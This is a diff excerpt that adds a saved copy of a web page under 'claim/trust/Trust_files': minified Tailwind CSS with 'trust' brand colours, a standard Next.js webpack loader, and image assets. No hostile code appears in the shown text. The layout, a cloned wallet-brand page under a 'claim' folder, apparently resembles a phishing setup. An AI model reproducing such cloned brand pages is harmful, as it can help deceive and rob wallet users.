.125rem}.tablet\:leading-desktopButton{line-height:1.3125rem}.tablet\:leading-desktopH1{line-height:3.75rem}.tablet\:leading-desktopH2{line-height:2.6875rem}.tablet\:leading-desktopH3{line-height:2.0625rem}.tablet\:leading-desktopH4{line-height:1.6875rem}.tablet\:leading-desktopH5{line-height:1.1875rem}.data-\[odd\=false\]\:tablet\:col-start-2[data-odd=false]{grid-column-start:2}.data-\[sequential\=true\]\:tablet\:\!pt-32[data-sequential=true]{padding-top:8rem!important}.tablet\:data-\[sequential\=true\]\:\!pb-16[data-sequential=true]{padding-bottom:4rem!important}:is(.dark .dark\:tablet\:\!border-tintBlack){--tw-border-opacity:1!important;border-color:rgb(75 75 75/var(--tw-border-opacity))!important}:is(.dark .tablet\:dark\:\!bg-lightBlack){--tw-bg-opacity:1!important;background-color:rgb(36 36 38/var(--tw-bg-opacity))!important}}@media(min-width:992px){.desktop\:absolute{position:absolute}.desktop\:-right-\[600px\]{right:-600px}.desktop\:-top-4{top:-1rem}.desktop\:-top-\[67\%\]{top:-67%}.desktop\:bottom-0{bottom:0}.desktop\:right-3{right:.75rem}.desktop\:right-\[29\%\]{right:29%}.desktop\:col-start-1{grid-column-start:1}.desktop\:col-start-2{grid-column-start:2}.desktop\:col-end-4{grid-column-end:4}.desktop\:row-start-1{grid-row-start:1}.desktop\:row-start-2{grid-row-start:2}.desktop\:row-end-4{grid-row-end:4}.desktop\:m-0{margin:0}.desktop\:-mt-20{margin-top:-5rem}.desktop\:-mt-\[29\%\]{margin-top:-29%}.desktop\:-mt-\[90px\]{margin-top:-90px}.desktop\:mb-0{margin-bottom:0}.desktop\:mb-10{margin-bottom:2.5rem}.desktop\:mb-16{margin-bottom:4rem}.desktop\:ml-6{margin-left:1.5rem}.desktop\:ml-auto{margin-left:auto}.desktop\:mt-0{margin-top:0}.desktop\:mt-10{margin-top:2.5rem}.desktop\:mt-16{margin-top:4rem}.desktop\:mt-20{margin-top:5rem}.desktop\:mt-5{margin-top:1.25rem}.desktop\:mt-6{margin-top:1.5rem}.desktop\:mt-9{margin-top:2.25rem}.desktop\:block{display:block}.desktop\:flex{display:flex}.desktop\:grid{display:grid}.desktop\:hidden{display:none}.desktop\:h-\[230px\]{height:230px}.desktop\:h-\[255px\]{height:255px}.desktop\:h-\[310px\]{height:310px}.desktop\:h-\[350px\]{height:350px}.desktop\:h-\[370px\]{height:370px}.desktop\:h-\[400px\]{height:400px}.desktop\:h-\[440px\]{height:440px}.desktop\:h-\[470px\]{height:470px}.desktop\:h-\[490px\]{height:490px}.desktop\:h-\[65px\]{height:65px}.desktop\:h-auto{height:auto}.desktop\:max-h-\[521px\]{max-height:521px}.desktop\:min-h-\[310px\]{min-height:310px}.desktop\:min-h-\[350px\]{min-height:350px}.desktop\:min-h-\[420px\]{min-height:420px}.desktop\:min-h-\[500px\]{min-height:500px}.desktop\:min-h-\[520px\]{min-height:520px}.desktop\:min-h-\[660px\]{min-height:660px}.desktop\:\!w-full{width:100%!important}.desktop\:w-\[58px\]{width:58px}.desktop\:w-\[65px\]{width:65px}.desktop\:w-auto{width:auto}.desktop\:w-fit{width:-moz-fit-content;width:fit-content}.desktop\:min-w-\[unset\]{min-width:unset}.desktop\:max-w-\[250px\]{max-width:250px}.desktop\:max-w-\[370px\]{max-width:370px}.desktop\:max-w-\[430px\]{max-width:430px}.desktop\:max-w-\[445px\]{max-width:445px}.desktop\:max-w-\[470px\]{max-width:470px}.desktop\:max-w-\[534px\]{max-width:534px}.desktop\:max-w-none{max-width:none}.desktop\:max-w-screen-max{max-width:1200px}.desktop\:flex-1{flex:1 1 0%}.desktop\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}.desktop\:grid-cols-3{grid-template-columns:repeat(3,minmax(0,1fr))}.desktop\:grid-cols-4{grid-template-columns:repeat(4,minmax(0,1fr))}.desktop\:grid-cols-\[1fr_2fr_1fr\]{grid-template-columns:1fr 2fr 1fr}.desktop\:grid-cols-\[auto\2c 2fr\2c 1fr\]{grid-template-columns:auto 2fr 1fr}.desktop\:grid-cols-\[repeat\(5\2c 1fr\)\]{grid-template-columns:repeat(5,1fr)}.desktop\:grid-rows-\[repeat\(3\2c auto\)\]{grid-template-rows:repeat(3,auto)}.desktop\:flex-row{flex-direction:row}.desktop\:flex-row-reverse{flex-direction:row-reverse}.desktop\:flex-nowrap{flex-wrap:nowrap}.desktop\:items-start{align-items:flex-start}.desktop\:items-center{align-items:center}.desktop\:justify-start{justify-content:flex-start}.desktop\:justify-end{justify-content:flex-end}.desktop\:justify-center{justify-content:center}.desktop\:justify-between{justify-content:space-between}.desktop\:gap-4{gap:1rem}.desktop\:gap-5{gap:1.25rem}.desktop\:gap-6{gap:1.5rem}.desktop\:gap-7{gap:1.75rem}.desktop\:gap-x-10{-moz-column-gap:2.5rem;column-gap:2.5rem}.desktop\:gap-y-8{row-gap:2rem}.desktop\:justify-self-start{justify-self:start}.desktop\:rounded-\[30px\]{border-radius:30px}.desktop\:rounded-\[40px\]{border-radius:40px}.desktop\:\!bg-\[transparent\]{background-color:transparent!important}.desktop\:\!p-5{padding:1.25rem!important}.desktop\:p-0{padding:0}.desktop\:p-16{padding:4rem}.desktop\:p-8{padding:2rem}.desktop\:\!px-24{padding-left:6rem!important;padding-right:6rem!important}.desktop\:\!px-8{padding-left:2rem!important;padding-right:2rem!important}.desktop\:\!py-12{padding-bottom:3rem!important;padding-top:3rem!important}.desktop\:px-\[100px\]{padding-left:100px;padding-right:100px}.desktop\:py-10{padding-bottom:2.5rem;padding-top:2.5rem}.desktop\:py-14{padding-bottom:3.5rem;padding-top:3.5rem}.desktop\:py-7{padding-bottom:1.75rem;padding-top:1.75rem}.desktop\:text-left{text-align:left}.desktop\:text-center{text-align:center}.desktop\:\!text-desktopH1{font-size:3.25rem!important}.desktop\:text-\[5rem\]{font-size:5rem}.desktop\:\!leading-desktopH1{line-height:3.75rem!important}.desktop\:opacity-100{opacity:1}.data-\[textleft\=true\]\:desktop\:col-start-1[data-textleft=true]{grid-column-start:1}.data-\[odd\=true\]\:desktop\:col-end-4[data-odd=true]{grid-column-end:4}.data-\[textleft\=true\]\:desktop\:row-end-2[data-textleft=true]{grid-row-end:2}.data-\[hasmargin\=true\]\:desktop\:ml-20[data-hasmargin=true]{margin-left:5rem}}@media(min-width:1200px){.max\:-right-\[14\%\]{right:-14%}.max\:-top-10{top:-2.5rem}.max\:left-\[47\%\]{left:47%}.max\:left-\[59\%\]{left:59%}.max\:right-3{right:.75rem}.max\:right-\[425px\]{right:425px}.max\:mx-0{margin-left:0;margin-right:0}.max\:mb-14{margin-bottom:3.5rem}.max\:mt-20{margin-top:5rem}.max\:block{display:block}.max\:w-\[unset\]{width:unset}.max\:w-full{width:100%}.max\:max-w-\[350px\]{max-width:350px}.max\:justify-between{justify-content:space-between}.max\:gap-6{gap:1.5rem}.max\:px-0{padding-left:0;padding-right:0}}.\[\&\>a\>svg\]\:h-14>a>svg{height:3.5rem}.\[\&\>a\>svg\]\:w-14>a>svg{width:3.5rem}@media(min-width:992px){.desktop\:\[\&\>a\>svg\]\:h-9>a>svg{height:2.25rem}.desktop\:\[\&\>a\>svg\]\:w-9>a>svg{width:2.25rem}}.\[\&\>button\>strong\]\:data-\[onview\=false\]\:\!font-normal[data-onview=false]>button>strong{font-weight:400!important}.\[\&\>div\>h2\]\:mb-3>div>h2{margin-bottom:.75rem}.\[\&\>div\>p\]\:\!max-w-\[60ch\]>div>p{max-width:60ch!important}.\[\&\>div\]\:gap-2>div{gap:.5rem}.\[\&\>h2\]\:\!text-trustWhite>h2{--tw-text-opacity:1!important;color:rgb(255 255 255/var(--tw-text-opacity))!important}:is(.dark .\[\&\>h2\]\:dark\:\!text-trustBlack)>h2{--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}.\[\&\>h3\]\:\!text-trustWhite>h3{--tw-text-opacity:1!important;color:rgb(255 255 255/var(--tw-text-opacity))!important}:is(.dark .\[\&\>h3\]\:dark\:\!text-trustBlack)>h3{--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}.\[\&\>h4\>span\]\:text-trustBlue>h4>span{--tw-text-opacity:1;color:rgb(5 0 255/var(--tw-text-opacity))}:is(.dark .\[\&\>h4\>span\]\:dark\:text-trustGreen)>h4>span{--tw-text-opacity:1;color:rgb(72 255 145/var(--tw-text-opacity))}.\[\&\>p\]\:\!text-trustWhite>p{--tw-text-opacity:1!important;color:rgb(255 255 255/var(--tw-text-opacity))!important}:is(.dark .\[\&\>p\]\:dark\:\!text-trustBlack)>p{--tw-text-opacity:1!important;color:rgb(27 27 28/var(--tw-text-opacity))!important}.\[\&\>strong\]\:\!font-bold>strong{font-weight:700!important}.\[\&\>svg\>path\:first-of-type\]\:hover\:\!fill-trustBlue:hover>svg>path:first-of-type{fill:#0500ff!important}:is(.dark .dark\:\[\&\>svg\>path\:first-of-type\]\:hover\:\!fill-trustGreen:hover>svg>path:first-of-type){fill:#48ff91!important}.\[\&\>svg\>path\:last-of-type\]\:hover\:\!fill-trustWhite:hover>svg>path:last-of-type{fill:#fff!important}:is(.dark .dark\:\[\&\>svg\>path\:last-of-type\]\:hover\:\!fill-trustBlack:hover>svg>path:last-of-type){fill:#1b1b1c!important}.\[\&\>svg\]\:absolute>svg{position:absolute}.\[\&\>svg\]\:-top-px>svg{top:-1px}.\[\&\>svg\]\:h-\[105\%\]>svg{height:105%}.\[\&\>svg\]\:w-\[101\%\]>svg{width:101%}.\[\&\>svg\]\:w-full>svg{width:100%}
claim/trust/Trust_files/raw.1211abf0.svg ADDED
claim/trust/Trust_files/raw.4edbb099.svg ADDED
claim/trust/Trust_files/raw.9a6dd06f.svg ADDED
claim/trust/Trust_files/raw.b373ab3f.svg ADDED
claim/trust/Trust_files/raw.d07410b5.svg ADDED
claim/trust/Trust_files/raw.d927cfe4.svg ADDED
claim/trust/Trust_files/raw.e1c172b2.svg ADDED
claim/trust/Trust_files/raw.e4b77b0f.svg ADDED
claim/trust/Trust_files/raw.e7c57d68.svg ADDED
claim/trust/Trust_files/webpack-4fe6da641f3929c9.js.download ADDED
@@ -0,0 +1 @@
 
 
1
+ !function(){"use strict";var e,t,n,r,o,u,i,c,f,a={},l={};function s(e){var t=l[e];if(void 0!==t)return t.exports;var n=l[e]={exports:{}},r=!0;try{a[e](n,n.exports,s),r=!1}finally{r&&delete l[e]}return n.exports}s.m=a,e=[],s.O=function(t,n,r,o){if(n){o=o||0;for(var u=e.length;u>0&&e[u-1][2]>o;u--)e[u]=e[u-1];e[u]=[n,r,o];return}for(var i=1/0,u=0;u<e.length;u++){for(var n=e[u][0],r=e[u][1],o=e[u][2],c=!0,f=0;f<n.length;f++)i>=o&&Object.keys(s.O).every(function(e){return s.O[e](n[f])})?n.splice(f--,1):(c=!1,o<i&&(i=o));if(c){e.splice(u--,1);var a=r()}}return a},s.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return s.d(t,{a:t}),t},n=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},s.t=function(e,r){if(1&r&&(e=this(e)),8&r||"object"==typeof e&&e&&(4&r&&e.__esModule||16&r&&"function"==typeof e.then))return e;var o=Object.create(null);s.r(o);var u={};t=t||[null,n({}),n([]),n(n)];for(var i=2&r&&e;"object"==typeof i&&!~t.indexOf(i);i=n(i))Object.getOwnPropertyNames(i).forEach(function(t){u[t]=function(){return e[t]}});return u.default=function(){return e},s.d(o,u),o},s.d=function(e,t){for(var n in t)s.o(t,n)&&!s.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},s.f={},s.e=function(e){return Promise.all(Object.keys(s.f).reduce(function(t,n){return s.f[n](e,t),t},[]))},s.u=function(e){},s.miniCssF=function(e){return"static/css/6f535fa698ae581f.css"},s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||Function("return this")()}catch(e){if("object"==typeof window)return window}}(),s.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r={},o="_N_E:",s.l=function(e,t,n,u){if(r[e]){r[e].push(t);return}if(void 0!==n)for(var i,c,f=document.getElementsByTagName("script"),a=0;a<f.length;a++){var l=f[a];if(l.getAttribute("src")==e||l.getAttribute("data-webpack")==o+n){i=l;break}}i||(c=!0,(i=document.createElement("script")).charset="utf-8",i.timeout=120,s.nc&&i.setAttribute("nonce",s.nc),i.setAttribute("data-webpack",o+n),i.src=s.tu(e)),r[e]=[t];var d=function(t,n){i.onerror=i.onload=null,clearTimeout(p);var o=r[e];if(delete r[e],i.parentNode&&i.parentNode.removeChild(i),o&&o.forEach(function(e){return e(n)}),t)return t(n)},p=setTimeout(d.bind(null,void 0,{type:"timeout",target:i}),12e4);i.onerror=d.bind(null,i.onerror),i.onload=d.bind(null,i.onload),c&&document.head.appendChild(i)},s.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},s.tt=function(){return void 0===u&&(u={createScriptURL:function(e){return e}},"undefined"!=typeof trustedTypes&&trustedTypes.createPolicy&&(u=trustedTypes.createPolicy("nextjs#bundler",u))),u},s.tu=function(e){return s.tt().createScriptURL(e)},s.p="/_next/",i={272:0},s.f.j=function(e,t){var n=s.o(i,e)?i[e]:void 0;if(0!==n){if(n)t.push(n[2]);else if(272!=e){var r=new Promise(function(t,r){n=i[e]=[t,r]});t.push(n[2]=r);var o=s.p+s.u(e),u=Error();s.l(o,function(t){if(s.o(i,e)&&(0!==(n=i[e])&&(i[e]=void 0),n)){var r=t&&("load"===t.type?"missing":t.type),o=t&&t.target&&t.target.src;u.message="Loading chunk "+e+" failed.\n("+r+": "+o+")",u.name="ChunkLoadError",u.type=r,u.request=o,n[1](u)}},"chunk-"+e,e)}else i[e]=0}},s.O.j=function(e){return 0===i[e]},c=function(e,t){var n,r,o=t[0],u=t[1],c=t[2],f=0;if(o.some(function(e){return 0!==i[e]})){for(n in u)s.o(u,n)&&(s.m[n]=u[n]);if(c)var a=c(s)}for(e&&e(t);f<o.length;f++)r=o[f],s.o(i,r)&&i[r]&&i[r][0](),i[r]=0;return s.O(a)},(f=self.webpackChunk_N_E=self.webpackChunk_N_E||[]).forEach(c.bind(null,0)),f.push=c.bind(null,f.push.bind(f))}();
claim/trust/assets/imgs/Group 16837.png ADDED
claim/trust/assets/imgs/feather-ico/shopping-cart-black.svg ADDED
claim/trust/assets/imgs/feather-ico/trash.svg ADDED
claim/trust/assets/imgs/icon-black/chevron-left-black.svg ADDED
claim/trust/assets/imgs/icon-black/search-black.svg ADDED
claim/trust/assets/imgs/icon-white/close-white.svg ADDED